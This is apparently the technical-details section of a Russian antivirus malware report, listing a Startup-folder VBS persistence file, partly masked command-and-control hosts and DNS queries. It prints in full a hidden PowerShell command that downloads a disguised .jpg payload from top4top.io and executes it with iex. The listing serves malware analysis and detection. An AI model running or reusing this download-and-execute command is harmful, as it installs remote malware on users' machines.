Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\ dddd.vbs
- 'wi####s.zapto.org':7896
- 'k.###4top.io':443
- DNS ASK k.###4top.io
- DNS ASK wi####s.zapto.org
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit -C $cry = new-object Net.WebClient;iex $cry.DownloadString('https://k.top4top.io/p_1752a28u21.jpg')' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit -C $cry = new-object Net.WebClient;iex $cry.DownloadString('https://k.top4top.io/p_1752a28u21.jpg')